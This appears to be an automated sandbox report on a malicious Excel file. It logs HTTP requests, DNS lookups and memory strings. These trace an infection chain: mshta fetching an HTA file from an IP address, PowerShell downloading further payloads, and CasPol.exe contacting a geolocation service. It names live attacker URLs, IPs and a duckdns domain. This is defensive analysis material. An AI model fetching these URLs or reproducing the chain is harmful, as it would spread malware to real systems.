                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.29If-Range: "5a0de-627535b5bef4e"
                    Source: global trafficHTTP traffic detected: GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 20 Nov 2024 07:47:08 GMTConnection: Keep-AliveHost: 192.3.220.29If-None-Match: "5a0de-627535b5bef4e"
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49168 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49174 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89A34B18 URLDownloadToFileW,6_2_000007FE89A34B18
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33602862.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.29If-Range: "5a0de-627535b5bef4e"
                    Source: global trafficHTTP traffic detected: GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 20 Nov 2024 07:47:08 GMTConnection: Keep-AliveHost: 192.3.220.29If-None-Match: "5a0de-627535b5bef4e"
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: provit.uk
                    Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
                    Source: global trafficDNS traffic detected: DNS query: banaya.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.0000000003A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/
                    Source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehaving
                    Source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF
                    Source: powershell.exe, 00000006.00000002.490776775.000000001A746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC(
                    Source: powershell.exe, 00000014.00000002.537521208.000000001ACD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:
                    Source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFp
                    Source: mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.0000000000149000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.000000000012F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
                    Source: mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan
                    Source: mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan0
                    Source: mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.000000000015D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.000000000015D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.000000000015D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...
                    Source: mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...K
                    Source: mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaC:
                    Source: mshta.exe, 00000004.00000003.454723183.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.521827851.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524091180.0000000002A25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htahttp://192.3.220.29/45/ww/
                    Source: mshta.exe, 00000012.00000003.522772525.00000000000EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace
                    Source: mshta.exe, 00000004.00000003.453814399.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.00000000003E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace4
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&laceg
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: CasPol.exe, 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000006.00000002.480662155.00000000034EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.0000000002497000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
